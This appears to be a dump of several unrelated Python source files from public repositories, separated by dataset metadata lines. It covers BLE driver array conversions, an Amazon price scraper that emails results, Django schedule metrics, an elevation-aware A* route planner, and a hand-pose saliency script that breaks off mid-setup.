# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
# ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
import importlib
from blatann.nrf.nrf_dll_load import driver
UNIT_0_625_MS = 625 # Unit used for scanning and advertising parameters
UNIT_1_25_MS = 1250 # Unit used for connection interval parameters
UNIT_10_MS = 10000 # Unit used for supervision timeout parameter
def msec_to_units(time_ms, resolution):
"""Convert milliseconds to BLE specific time units."""
units = time_ms * 1000 / resolution
return int(units)
def units_to_msec(units, resolution):
"""Convert BLE specific units to milliseconds."""
time_ms = units * float(resolution) / 1000
return time_ms
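# Example of the conversions above (illustrative): a 100 ms advertising interval
# expressed in 0.625 ms units is msec_to_units(100, UNIT_0_625_MS) == 160,
# and units_to_msec(160, UNIT_0_625_MS) gives back 100.0 ms.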
def char_array_to_list(array_pointer, length):
"""Convert char_array to python list."""
data_array = driver.char_array.frompointer(array_pointer)
data_list = _populate_list(data_array, length)
return data_list
def uint8_array_to_list(array_pointer, length):
"""Convert uint8_array to python list."""
data_array = driver.uint8_array.frompointer(array_pointer)
data_list = _populate_list(data_array, length)
return data_list
def uint16_array_to_list(array_pointer, length):
"""Convert uint16_array to python list."""
data_array = driver.uint16_array.frompointer(array_pointer)
data_list = _populate_list(data_array, length)
return data_list
def service_array_to_list(array_pointer, length):
"""Convert ble_gattc_service_array to python list."""
data_array = driver.ble_gattc_service_array.frompointer(array_pointer)
data_list = _populate_list(data_array, length)
return data_list
def include_array_to_list(array_pointer, length):
"""Convert ble_gattc_include_array to python list."""
data_array = driver.ble_gattc_include_array.frompointer(array_pointer)
data_list = _populate_list(data_array, length)
return data_list
def ble_gattc_char_array_to_list(array_pointer, length):
"""Convert ble_gattc_char_array to python list."""
data_array = driver.ble_gattc_char_array.frompointer(array_pointer)
data_list = _populate_list(data_array, length)
return data_list
def desc_array_to_list(array_pointer, length):
"""Convert ble_gattc_desc_array to python list."""
data_array = driver.ble_gattc_desc_array.frompointer(array_pointer)
data_list = _populate_list(data_array, length)
return data_list
def ble_gattc_attr_info16_array_to_list(array_pointer, length):
"""Convert ble_gattc_attr_info16_array to python list"""
data_array = driver.ble_gattc_attr_info16_array.frompointer(array_pointer)
data_list = _populate_array(data_array, length)
return data_list
def ble_gattc_attr_info128_array_to_list(array_pointer, length):
"""Convert ble_gattc_attr_info128_array to python list"""
data_array = driver.ble_gattc_attr_info128_array.frompointer(array_pointer)
data_list = _populate_array(data_array, length)
return data_list
def handle_value_array_to_list(array_pointer, length):
"""Convert ble_gattc_handle_value_array to python list."""
data_array = driver.ble_gattc_handle_value_array.frompointer(array_pointer)
data_list = _populate_list(data_array, length)
return data_list
def attr_info_array_to_list(array_pointer, length):
"""Convert ble_gattc_attr_info_array to python list."""
data_array = driver.ble_gattc_attr_info_array.frompointer(array_pointer)
data_list = _populate_list(data_array, length)
return data_list
def attr_info16_array_to_list(array_pointer, length):
"""Convert ble_gattc_attr_info16_array to python list."""
data_array = driver.ble_gattc_attr_info16_array.frompointer(array_pointer)
data_list = _populate_list(data_array, length)
return data_list
def attr_info128_array_to_list(array_pointer, length):
"""Convert ble_gattc_attr_info128_array to python list."""
data_array = driver.ble_gattc_attr_info128_array.frompointer(array_pointer)
data_list = _populate_list(data_array, length)
return data_list
def serial_port_desc_array_to_list(array_pointer, length):
"""Convert sd_rpc_serial_port_desc_array to python list."""
data_array = driver.sd_rpc_serial_port_desc_array.frompointer(array_pointer)
data_list = _populate_list(data_array, length)
return data_list
def _populate_list(data_array, length):
data_list = []
for i in range(0, length):
data_list.append(data_array[i])
return data_list
def list_to_char_array(data_list):
"""Convert python list to char_array."""
data_array = _populate_array(data_list, driver.char_array)
return data_array
def list_to_uint8_array(data_list):
"""Convert python list to uint8_array."""
data_array = _populate_array(data_list, driver.uint8_array)
return data_array
def list_to_uint16_array(data_list):
"""Convert python list to uint16_array."""
data_array = _populate_array(data_list, driver.uint16_array)
return data_array
def list_to_service_array(data_list):
"""Convert python list to ble_gattc_service_array."""
data_array = _populate_array(data_list, driver.ble_gattc_service_array)
return data_array
def list_to_include_array(data_list):
"""Convert python list to ble_gattc_include_array."""
data_array = _populate_array(data_list, driver.ble_gattc_include_array)
return data_array
def list_to_ble_gattc_char_array(data_list):
"""Convert python list to ble_gattc_char_array."""
data_array = _populate_array(data_list, driver.ble_gattc_char_array)
return data_array
def list_to_desc_array(data_list):
"""Convert python list to ble_gattc_desc_array."""
data_array = _populate_array(data_list, driver.ble_gattc_desc_array)
return data_array
def list_to_handle_value_array(data_list):
"""Convert python list to ble_gattc_handle_value_array."""
data_array = _populate_array(data_list, driver.ble_gattc_handle_value_array)
return data_array
def list_to_serial_port_desc_array(data_list):
"""Convert python list to sd_rpc_serial_port_desc_array."""
data_array = _populate_array(data_list, driver.sd_rpc_serial_port_desc_array)
return data_array
def _populate_array(data_list, array_type):
length = len(data_list)
data_array = array_type(length)
for i in range(0, length):
data_array[i] = data_list[i]
return data_array
| 1.328125
| 1
|
scraper.py
|
aday913/web-scraper
| 0
|
12784817
|
<gh_stars>0
from requests_html import HTMLSession
from bs4 import BeautifulSoup
from mailer import Emailer
class Scraper(object):
    '''
    Main web scraping object. Currently fetches a hard-coded Amazon product page,
    scrapes the element with id 'price', and emails the result via the Emailer helper.
    '''
def __init__(self):
test = Emailer()
s = HTMLSession()
URL = 'https://smile.amazon.com/dp/0593298683'
header = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36',
'Accept' : 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language' : 'en-US,en;q=0.5',
'Accept-Encoding' : 'gzip',
'DNT' : '1',
'Connection' : 'close'}
r = s.get(URL, headers=header)
soup = BeautifulSoup(r.text, "html.parser")
results = soup.find(id='price')
print(results.get_text())
print('Trying to send an email...')
test.sendMessage(
'''\
Hey there! This is a test email, where the price for the item is {}!
'''.format(results.get_text())
)
print('Email sent.')
if __name__ == '__main__':
scraper = Scraper()
| 3.390625
| 3
|
src/api/spreadsheet.py
|
Dr4kk0nnys/django-schedule-api
| 2
|
12784818
|
"""
This whole file is dedicated to the creation of spreadsheets. Its existence is for marketing-related
purposes: it does involve programming, but it is more about marketing than engineering.
Note: This code is not accessible through normal runtime
"""
from datetime import date, timedelta
from .models import User
def get_user(token_id):
return User.objects.get(token_id=token_id)
# To get the token id of the user, just go to the admin page and search for it's email
def get_user_metrics(token_id):
user = get_user(token_id)
print(user.schedules_set.all())
# This function needs the date of the first day of the week to figure out which week you actually want
def get_user_weekly_metrics(token_id, day, month, year):
user = get_user(token_id)
start_date = date(year, month, day)
end_date = start_date + timedelta(days=7)
print(user.schedules_set.filter(date_and_time__date__gte=start_date, date_and_time__date__lte=end_date))
def get_total_schedules_from_two_accounts(first_account_token_id, second_account_token_id):
first_user = get_user(first_account_token_id)
second_user = get_user(second_account_token_id)
print(f'Total schedules of the first user: \n{first_user.schedules_set.all()}')
print(f'Total schedules of the second user: \n{second_user.schedules_set.all()}')
# This function gets the average of the newest and oldest schedule, so it's not as precise as a monthly average.
def get_user_entire_average_schedule_by_day(token_id):
user = get_user(token_id)
dates = user.schedules_set.all().order_by('date_and_time')
if dates.count() < 2:
print('Not enough schedules to create a metric')
return
newest_date = dates.first().date_and_time
oldest_date = dates.last().date_and_time
time_difference = newest_date - oldest_date
print(f'Newest date: {newest_date}')
print(f'Oldest date: {oldest_date}')
print(f'Time difference: {time_difference}')
print(f'Are they equal ? {newest_date == oldest_date}')
if abs(time_difference.days) <= 0:
print('The first and last date are the same. Cannot divide by zero. Considering time difference as 1.')
time_difference += timedelta(days=1)
average = dates.count() / abs(time_difference.days)
print(f'Average is: {average}')
# This function gets the average of the newest and oldest schedule of the month
def get_user_monthly_average_schedule_by_day(token_id, year, month):
user = get_user(token_id)
start_date = date(year, month, 1)
end_date = start_date + timedelta(days=30)
dates = user.schedules_set.filter(
date_and_time__date__gte=start_date,
date_and_time__date__lte=end_date
)
average = dates.count() / 30
print(f'Average is: {average}')
# This function is just a test; I'm trying to see if I can fetch three users with a single database query
def call_three_users_at_the_same_time(start_time, end_time, first_user_token_id, second_user_token_id, third_user_token_id):
# Getting three users with only one query
users = User.objects.filter(token_id__in=[first_user_token_id, second_user_token_id, third_user_token_id])
for i in range(users.count()):
# If the date is already scheduled. AKA if the 'surgeon' doesn't have time
if users[i].schedules_set.filter(date_and_time__gte=start_time, date_and_time__lte=end_time):
print('The crew is occupied! Sorry <3')
return
print('The crew is all available!')
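# Illustrative usage sketch (meant to be run from a Django shell; the token id and
# dates below are made up for the example):
# get_user_weekly_metrics('some-token-id', day=7, month=2, year=2022)
# get_user_monthly_average_schedule_by_day('some-token-id', year=2022, month=2)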
| 3.09375
| 3
|
src/assign1.py
|
jude-arokiam-uoit/csci-4610-assignment-1
| 0
|
12784819
|
<filename>src/assign1.py
from Tkinter import *
import struct
import xml.etree.ElementTree as ET
from Queue import *
import math
import logging
# bounds of the window, in lat/long
LEFTLON = -78.9697000
RIGHTLON = -78.9148000
TOPLAT = 43.9187000
BOTLAT = 43.8843000
WIDTH = RIGHTLON-LEFTLON
HEIGHT = TOPLAT-BOTLAT
# ratio of one degree of longitude to one degree of latitude
LONRATIO = math.cos(TOPLAT*3.1415/180)
WINWID = 800
WINHGT = (int)((WINWID/LONRATIO)*HEIGHT/WIDTH)
TOXPIX = WINWID/WIDTH
TOYPIX = WINHGT/HEIGHT
#width,height of elevation array
EPIX = 3601
# approximate number of meters per degree of latitude
MPERLAT = 111000
MPERLON = MPERLAT*LONRATIO
# way type
way_types = []
elevation_difference = []
def node_dist(n1, n2):
''' Distance between nodes n1 and n2, in meters. '''
dx = (n2.pos[0]-n1.pos[0])*MPERLON
dy = (n2.pos[1]-n1.pos[1])*MPERLAT
return math.sqrt(dx*dx+dy*dy) # in meters
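# Quick sanity check of the scale above (illustrative): two nodes that differ by 0.001
# degrees of latitude and share a longitude are roughly 0.001 * MPERLAT = 111 m apart.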
class Node():
''' Graph (map) node, not a search node! '''
    __slots__ = ('id', 'pos', 'ways', 'elev', 'waystr', 'wayset')  # waystr/wayset are set lazily below
def __init__(self,id,p,e=0):
self.id = id
self.pos = p
self.ways = []
self.elev = e
self.waystr = None
def __str__(self):
if self.waystr is None:
self.waystr = self.get_waystr()
return str(self.pos) + ": " + self.waystr
def get_waystr(self):
if self.waystr is None:
self.waystr = ""
self.wayset = set()
for w in self.ways:
self.wayset.add(w.way.name)
for w in self.wayset:
self.waystr += w.encode("utf-8") + " "
return self.waystr
class Edge():
''' Graph (map) edge. Includes cost computation.'''
    __slots__ = ('way', 'dest', 'cost')  # cost is assigned in __init__ below
def __init__(self, w, src, d):
self.way = w
self.dest = d
self.cost = node_dist(src,d)
difference = abs(d.elev - src.elev)
if d.elev > src.elev:
#A steep uphill way will increase cost
if difference > 30:
self.cost += difference*2
else:
self.cost += (difference)*0.5
else:
#A steep downhill way will increase cost
if difference > 30:
self.cost += difference*2
else:
self.cost -= (difference)*0.5
way_types.append(self.way.type)
class Way():
''' A way is an entire street, for drawing, not searching. '''
__slots__ = ('name','type','nodes')
# nodes here for ease of drawing only
def __init__(self,n,t):
self.name = n
self.type = t
self.nodes = []
class Planner():
__slots__ = ('nodes', 'ways')
def __init__(self,n,w):
self.nodes = n
self.ways = w
def heur(self,node,gnode):
'''
Heuristic function is just straight-line (flat) distance.
Since the actual cost only adds to this distance, this is admissible.
        Refer to the Edge class for the edge cost computation.
'''
return node_dist(node,gnode)
def plan(self,s,g):
'''
Standard A* search
'''
parents = {}
costs = {}
q = PriorityQueue()
q.put((self.heur(s,g),s))
parents[s] = None
costs[s] = 0
while not q.empty():
cf, cnode = q.get()
if cnode == g:
print ("Path found, time will be",costs[g]*60/5000) #5 km/hr on flat
return self.make_path(parents,g)
for edge in cnode.ways:
newcost = costs[cnode] + edge.cost
if edge.dest not in parents or newcost < costs[edge.dest]:
parents[edge.dest] = (cnode, edge.way)
costs[edge.dest] = newcost
q.put((self.heur(edge.dest,g)+newcost,edge.dest))
def make_path(self,par,g):
nodes = []
ways = []
curr = g
nodes.append(curr)
while par[curr] is not None:
prev, way = par[curr]
ways.append(way.name)
nodes.append(prev)
curr = prev
nodes.reverse()
ways.reverse()
return nodes,ways
class PlanWin(Frame):
'''
All the GUI pieces to draw the streets, allow places to be selected,
and then draw the resulting path.
'''
    __slots__ = ('whatis', 'nodes', 'ways', 'elevs', 'nodelab', 'elab', \
                 'planner', 'lastnode', 'startnode', 'goalnode', 'canvas', 'snpix')
def lat_lon_to_pix(self,latlon):
x = (latlon[1]-LEFTLON)*(TOXPIX)
y = (TOPLAT-latlon[0])*(TOYPIX)
return x,y
def pix_to_elev(self,x,y):
return self.lat_lon_to_elev(((TOPLAT-(y/TOYPIX)),((x/TOXPIX)+LEFTLON)))
def lat_lon_to_elev(self,latlon):
# row is 0 for 43N, 1201 (EPIX) for 42N
row = (int)((43 - latlon[0]) * EPIX)
# col is 0 for 18 E, 1201 for 19 E
col = (int)((latlon[1]-18) * EPIX)
return self.elevs[row*EPIX+col]
def maphover(self,event):
self.elab.configure(text = str(self.pix_to_elev(event.x,event.y)))
for (dx,dy) in [(0,0),(-1,0),(0,-1),(1,0),(0,1),(-1,-1),(-1,1),(1,-1),(1,1)]:
ckpos = (event.x+dx,event.y+dy)
if ckpos in self.whatis:
self.lastnode = self.whatis[ckpos]
lnpos = self.lat_lon_to_pix(self.nodes[self.lastnode].pos)
self.canvas.coords('lastdot',(lnpos[0]-2,lnpos[1]-2,lnpos[0]+2,lnpos[1]+2))
nstr = str(self.lastnode)
nstr += " "
nstr += str(self.nodes[self.whatis[ckpos]].get_waystr())
self.nodelab.configure(text=nstr)
return
def mapclick(self,event):
''' Canvas click handler:
First click sets path start, second sets path goal
'''
print "Clicked on "+str(event.x)+","+str(event.y)+" last node "+str(self.lastnode)
if self.lastnode is None:
return
if self.startnode is None:
self.startnode = self.nodes[self.lastnode]
self.snpix = self.lat_lon_to_pix(self.startnode.pos)
self.canvas.coords('startdot',(self.snpix[0]-2,self.snpix[1]-2,self.snpix[0]+2,self.snpix[1]+2))
elif self.goalnode is None:
self.goalnode = self.nodes[self.lastnode]
self.snpix = self.lat_lon_to_pix(self.goalnode.pos)
self.canvas.coords('goaldot',(self.snpix[0]-2,self.snpix[1]-2,self.snpix[0]+2,self.snpix[1]+2))
def clear(self):
''' Clear button callback. '''
self.lastnode = None
self.goalnode = None
self.startnode = None
self.canvas.coords('startdot',(0,0,0,0))
self.canvas.coords('goaldot',(0,0,0,0))
self.canvas.coords('path',(0,0,0,0))
def plan_path(self):
''' Path button callback, plans and then draws path.'''
print "Planning!"
if self.startnode is None or self.goalnode is None:
print "Sorry, not enough info."
return
print ("From", self.startnode.id, "to", self.goalnode.id)
if self.startnode is None or self.goalnode is None:
print 'nodes are none'
nodes,ways = self.planner.plan(self.startnode, self.goalnode)
lastway = ""
for wayname in ways:
if wayname != lastway:
print wayname
lastway = wayname
coords = []
for node in nodes:
npos = self.lat_lon_to_pix(node.pos)
coords.append(npos[0])
coords.append(npos[1])
#print node.id
self.canvas.coords('path',*coords)
def print_nodes(self):
print ("1: ", self.startnode.id, "2: ", self.goalnode.id)
print (self.startnode)
def __init__(self,master,nodes,ways,coastnodes,elevs):
self.whatis = {}
self.nodes = nodes
self.ways = ways
self.elevs = elevs
self.startnode = None
self.goalnode = None
self.planner = Planner(nodes,ways)
thewin = Frame(master)
w = Canvas(thewin, width=WINWID, height=WINHGT)#, cursor="crosshair")
w.bind("<Button-1>", self.mapclick)
w.bind("<Motion>", self.maphover)
for waynum in self.ways:
nlist = self.ways[waynum].nodes
thispix = self.lat_lon_to_pix(self.nodes[nlist[0]].pos)
if len(self.nodes[nlist[0]].ways) > 2:
self.whatis[((int)(thispix[0]),(int)(thispix[1]))] = nlist[0]
for n in range(len(nlist)-1):
nextpix = self.lat_lon_to_pix(self.nodes[nlist[n+1]].pos)
self.whatis[((int)(nextpix[0]),(int)(nextpix[1]))] = nlist[n+1]
w.create_line(thispix[0],thispix[1],nextpix[0],nextpix[1])
thispix = nextpix
thispix = self.lat_lon_to_pix(self.nodes[coastnodes[0]].pos)
# also draw the coast:
for n in range(len(coastnodes)-1):
nextpix = self.lat_lon_to_pix(self.nodes[coastnodes[n+1]].pos)
w.create_line(thispix[0],thispix[1],nextpix[0],nextpix[1],fill="blue")
thispix = nextpix
# other visible things are hiding for now...
w.create_line(0,0,0,0,fill='orange',width=3,tag='path')
w.create_oval(0,0,0,0,outline='green',fill='green',tag='startdot')
w.create_oval(0,0,0,0,outline='red',fill='red',tag='goaldot')
w.create_oval(0,0,0,0,outline='blue',fill='blue',tag='lastdot')
w.pack(fill=BOTH)
self.canvas = w
cb = Button(thewin, text="Clear", command=self.clear)
cb.pack(side=RIGHT,pady=5)
sb = Button(thewin, text="Plan!", command=self.plan_path)
sb.pack(side=RIGHT,pady=5)
sb = Button(thewin, text="Nodes", command=self.print_nodes)
sb.pack(side=RIGHT,pady=5)
nodelablab = Label(thewin, text="Node:")
nodelablab.pack(side=LEFT, padx = 5)
self.nodelab = Label(thewin,text="None")
self.nodelab.pack(side=LEFT,padx = 5)
elablab = Label(thewin, text="Elev:")
elablab.pack(side=LEFT, padx = 5)
self.elab = Label(thewin, text = "0")
self.elab.pack(side=LEFT, padx = 5)
thewin.pack()
def build_elevs(efilename):
''' read in elevations from a file. '''
efile = open(efilename)
estr = efile.read()
elevs = []
for spot in range(0,len(estr),2):
elevs.append(struct.unpack('<h',estr[spot:spot+2])[0])
return elevs
def build_graph(elevs):
''' Build the search graph from the OpenStreetMap XML. '''
tree = ET.parse('whitby.osm')
root = tree.getroot()
print root
nodes = dict()
ways = dict()
waytypes = set()
coastnodes = []
for item in root:
if item.tag == 'node':
coords = ((float)(item.get('lat')),(float)(item.get('lon')))
# row is 0 for 43N, 1201 (EPIX) for 42N
erow = (int)((43 - coords[0]) * EPIX)
# col is 0 for 18 E, 1201 for 19 E
ecol = (int)((coords[1]-18) * EPIX)
try:
el = elevs[erow*EPIX+ecol]
except IndexError:
el = 0
nodes[(long)(item.get('id'))] = Node((long)(item.get('id')),coords,el)
elif item.tag == 'way':
if item.get('id') == '26250657': #main coastline way ID
for thing in item:
if thing.tag == 'nd':
coastnodes.append((long)(thing.get('ref')))
continue
useme = False
oneway = False
myname = 'unnamed way'
for thing in item:
if thing.tag == 'tag' and thing.get('k') == 'highway':
useme = True
mytype = thing.get('v')
if thing.tag == 'tag' and thing.get('k') == 'name':
myname = thing.get('v')
if thing.tag == 'tag' and thing.get('k') == 'oneway':
if thing.get('v') == 'yes':
oneway = True
if useme:
wayid = (long)(item.get('id'))
ways[wayid] = Way(myname,mytype)
nlist = []
for thing in item:
if thing.tag == 'nd':
nlist.append((long)(thing.get('ref')))
thisn = nlist[0]
for n in range(len(nlist)-1):
nextn = nlist[n+1]
nodes[thisn].ways.append(Edge(ways[wayid],nodes[thisn],nodes[nextn]))
thisn = nextn
if not oneway:
thisn = nlist[-1]
for n in range(len(nlist)-2,-1,-1):
nextn = nlist[n]
nodes[thisn].ways.append(Edge(ways[wayid],nodes[thisn],nodes[nextn]))
thisn = nextn
ways[wayid].nodes = nlist
print len(coastnodes)
print coastnodes[0]
#print coastnodes
print nodes[coastnodes[0]]
return nodes, ways, coastnodes
elevs = build_elevs("n43_w114_1arc_v2.bil")
nodes, ways, coastnodes = build_graph(elevs)
print set(way_types)
master = Tk()
thewin = PlanWin(master,nodes,ways,coastnodes,elevs)
mainloop()
| 3.171875
| 3
|
pose_integrated_gradient.py
|
QY-H00/hand_pose
| 0
|
12784820
|
<gh_stars>0
import argparse
import os
os.environ["CUDA_VISIBLE_DEVICES"] = '4,5,6,7'
import numpy as np
import torch
import time
import cv2
import pickle
from pathlib import Path
from kornia.geometry.dsnt import spatial_softmax_2d, spatial_softargmax_2d
from IG.SaliencyModel.BackProp import attribution_objective
from IG.SaliencyModel.BackProp import saliency_map_PG as saliency_map
from IG.SaliencyModel.BackProp import GaussianBlurPath
from IG.SaliencyModel.utils import cv2_to_pil, pil_to_cv2, gini, grad_abs_norm, vis_saliency, vis_saliency_kde
from IG.SaliencyModel.utils import interpolation, isotropic_gaussian_kernel, make_pil_grid
from IG.ModelZoo.utils import _add_batch_one
from data.rhd_dataset import RHDDateset
from data.eval_utils import AverageMeter
from progress.bar import Bar
def regress25d(heatmaps, beta):
bs = heatmaps.shape[0]
betas = beta.clone().view(1, 21, 1).repeat(bs, 1, 1)
uv_heatmaps = spatial_softmax_2d(heatmaps, betas)
coord_out = spatial_softargmax_2d(uv_heatmaps, normalized_coordinates=False)
coord_out_final = coord_out.clone()
return coord_out_final.view(bs, 21, 2)
def Path_gradient(numpy_image, model, gt, path_interpolation_func, joint_number, noise = None, cuda=False):
"""
:param path_interpolation_func:
return \lambda(\alpha) and d\lambda(\alpha)/d\alpha, for \alpha\in[0, 1]
    This function returns pil_numpy_images.
:return:
"""
if cuda:
model = model.cuda()
cv_numpy_image = np.moveaxis(numpy_image, 0, 2)
if noise is None:
noise = np.zeros_like(numpy_image)
image_interpolation, lambda_derivative_interpolation = path_interpolation_func(cv_numpy_image)
grad_accumulate_list = np.zeros_like(image_interpolation)
result_list = []
for i in range(image_interpolation.shape[0]):
img_tensor = torch.from_numpy(image_interpolation[i]).cuda()
img_tensor = img_tensor + torch.from_numpy(noise).float().cuda()
img_tensor.requires_grad_(True)
result = model(_add_batch_one(img_tensor).cuda())
# result = regress25d(result, beta)
result = result[:, joint_number:joint_number+1]
target = torch.exp(-0.3*torch.linalg.norm(result - gt.cuda()))
target.backward()
grad = img_tensor.grad.cpu().detach().numpy()
if np.any(np.isnan(grad)):
grad[np.isnan(grad)] = 0.0
grad_accumulate_list[i] = grad * lambda_derivative_interpolation[i]
result_list.append(result.cpu().detach().numpy())
results_numpy = np.asarray(result_list)
return grad_accumulate_list, results_numpy, image_interpolation
def GaussianLinearPath(sigma, fold, l=5):
def path_interpolation_func(cv_numpy_image):
kernel = isotropic_gaussian_kernel(l, sigma)
baseline_image = cv2.filter2D(cv_numpy_image, -1, kernel)
image_interpolation = interpolation(cv_numpy_image, baseline_image, fold, mode='linear').astype(np.float32)
lambda_derivative_interpolation = np.repeat(np.expand_dims(cv_numpy_image - baseline_image, axis=0), fold, axis=0)
return np.moveaxis(image_interpolation, 3, 1).astype(np.float32), \
np.moveaxis(lambda_derivative_interpolation, 3, 1).astype(np.float32)
return path_interpolation_func
def invert_GaussianLinearPath(sigma, fold, l=5):
def path_interpolation_func(cv_numpy_image):
kernel = isotropic_gaussian_kernel(l, sigma)
baseline_image = cv_numpy_image - cv2.filter2D(cv_numpy_image, -1, kernel)
image_interpolation = interpolation(cv_numpy_image, baseline_image, fold, mode='linear').astype(np.float32)
lambda_derivative_interpolation = np.repeat(np.expand_dims(cv_numpy_image - baseline_image, axis=0), fold, axis=0)
return np.moveaxis(image_interpolation, 3, 1).astype(np.float32), \
np.moveaxis(lambda_derivative_interpolation, 3, 1).astype(np.float32)
return path_interpolation_func
def get_pose_integrated_gradient(model, uv_crop, img_crop, joint_number,
window_size=4, sigma=1.2, fold=50, l=9, alpha=0.5, smooth=True, vis=False):
img_crop = img_crop.permute(1, 2, 0)
min = torch.min(torch.min(img_crop, dim=0)[0], dim=0)[0]
max = torch.max(torch.max(img_crop, dim=0)[0], dim=0)[0]
img_show = (img_crop - min) / (max - min)
img_show = np.array(img_show)
img_show = img_show * 255
uv_crop_zero = uv_crop[joint_number] * 4
w = uv_crop_zero[0].type(torch.IntTensor)
h = uv_crop_zero[1].type(torch.IntTensor)
draw_img = pil_to_cv2(img_show)
cv2.rectangle(draw_img, (int(w - window_size // 2), int(h - window_size // 2)),
(int(w + window_size // 2), int(h + window_size // 2)),
(0, 0, 1), 2)
w = w // 4
h = h // 4
window_size = window_size // 4
position_pil = cv2_to_pil(draw_img)
gaus_blur_path_func = GaussianBlurPath(sigma, fold, l)
img_tensor = img_crop.permute(2, 0, 1)
image_numpy = img_tensor.cpu().detach().numpy()
if smooth:
stdev = 0.01 * (np.max(image_numpy) - np.min(image_numpy))
total_gradients = np.zeros_like(image_numpy, dtype=np.float32)
for _ in range(10):
noise = np.random.normal(0, stdev, image_numpy.shape)
interpolated_grad_numpy, result_numpy, interpolated_numpy = Path_gradient(image_numpy, model,
uv_crop[joint_number],
gaus_blur_path_func,
joint_number,
noise=noise,
cuda=True)
grad_numpy, result = saliency_map(interpolated_grad_numpy, result_numpy)
total_gradients += (grad_numpy * grad_numpy)
grad_numpy_final = total_gradients / 10
else:
interpolated_grad_numpy, result_numpy, interpolated_numpy = Path_gradient(image_numpy, model,
uv_crop[joint_number],
gaus_blur_path_func, joint_number,
cuda=True)
grad_numpy_final, result = saliency_map(interpolated_grad_numpy, result_numpy)
abs_normed_grad_numpy = grad_abs_norm(grad_numpy_final)
# Visualization takes more time
if not vis:
return abs_normed_grad_numpy
else:
saliency_image_abs = vis_saliency(abs_normed_grad_numpy, zoomin=1)
saliency_image_kde = vis_saliency_kde(abs_normed_grad_numpy)
saliency_image_kde = saliency_image_kde.resize(position_pil.size)
blend_abs_and_input = cv2_to_pil(pil_to_cv2(saliency_image_abs) * (1.0 - alpha) + pil_to_cv2(img_show) * alpha)
blend_kde_and_input = cv2_to_pil(pil_to_cv2(saliency_image_kde) * (1.0 - alpha) + pil_to_cv2(img_show) * alpha)
pil = make_pil_grid(
[position_pil,
saliency_image_abs,
saliency_image_kde,
blend_abs_and_input,
blend_kde_and_input]
)
return abs_normed_grad_numpy, pil
def get_pose_integrated_gradient_no_vis(model, uv_crop, img_crop, joint_number,
window_size=4, sigma=1.2, fold=50, l=9, smooth=True):
img_crop = img_crop.permute(1, 2, 0)
uv_crop_zero = uv_crop[joint_number] * 4
w = uv_crop_zero[0].type(torch.IntTensor)
h = uv_crop_zero[1].type(torch.IntTensor)
w = w // 4
h = h // 4
gaus_blur_path_func = GaussianBlurPath(sigma, fold, l)
img_tensor = img_crop.permute(2, 0, 1)
image_numpy = img_tensor.cpu().detach().numpy()
if smooth:
stdev = 0.01 * (np.max(image_numpy) - np.min(image_numpy))
total_gradients = np.zeros_like(image_numpy, dtype=np.float32)
for _ in range(10):
noise = np.random.normal(0, stdev, image_numpy.shape)
interpolated_grad_numpy, result_numpy, interpolated_numpy = Path_gradient(image_numpy, model,
uv_crop[joint_number],
gaus_blur_path_func,
joint_number,
noise=noise,
cuda=True)
grad_numpy, result = saliency_map(interpolated_grad_numpy, result_numpy)
total_gradients += (grad_numpy * grad_numpy)
grad_numpy_final = total_gradients / 10
else:
interpolated_grad_numpy, result_numpy, interpolated_numpy = Path_gradient(image_numpy, model,
uv_crop[joint_number],
gaus_blur_path_func, joint_number,
cuda=True)
grad_numpy_final, result = saliency_map(interpolated_grad_numpy, result_numpy)
abs_normed_grad_numpy = grad_abs_norm(grad_numpy_final)
return abs_normed_grad_numpy
def get_diffusion(abs_normed_grad_numpy):
gini_index = gini(abs_normed_grad_numpy)
diffusion_index = (1 - gini_index) * 100
return diffusion_index
def get_attention(grad, mask):
# grad_mask = np.where(grad == 0, 0, 1)
hand_mask_percentage = np.sum(mask) / ((mask.shape[0] + 1) * (mask.shape[1] + 1))
score = np.sum(grad * mask) / np.sum(grad)
# score_binary_attr = np.sum(grad_mask * mask) / np.sum(grad_mask)
# score_normed_attr = score_attr / hand_mask_percentage
score = score / hand_mask_percentage
return score
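# Illustrative check of the normalization above (toy numbers, not real data): if 80% of the
# gradient mass falls inside a mask that covers 40% of the image, the attention score is
# 0.8 / 0.4 = 2.0, i.e. attribution is concentrated on the hand region.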
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description='PyTorch Train Hourglass On 2D Keypoint Detection')
parser.add_argument(
'-m',
'--mode',
type=str,
default='regression',
help='regression/softargmax/detection'
)
parser.add_argument(
'-s',
'--start_idx',
type=int,
default=0,
help='regression/softargmax/detection'
)
parser.add_argument(
'-e',
'--end_idx',
type=int,
default=31,
help='regression/softargmax/detection'
)
parser.add_argument(
'-i',
'--vis',
action='store_true',
default=False
)
args = parser.parse_args()
mode = args.mode
start_sample_size = args.start_idx
end_sample_size = args.end_idx
batch_size = 32
model = torch.load(f'trained_model_{mode}/model.pkl')
beta = torch.mul(torch.ones(21), 5).cuda()
print("\nCREATE DATASET...")
val_dataset = RHDDateset('RHD_published_v2/', 'evaluation', input_size=256, output_full=True, aug=False)
print("\nLOAD DATASET...")
val_loader = torch.utils.data.DataLoader(
val_dataset,
batch_size=batch_size,
shuffle=False,
pin_memory=True
)
if not args.vis:
diffusion = AverageMeter()
attention = AverageMeter()
length = len(val_loader) * batch_size * 21
bar = Bar(f'\033[31m process \033[0m', max=length)
sample_num = -1
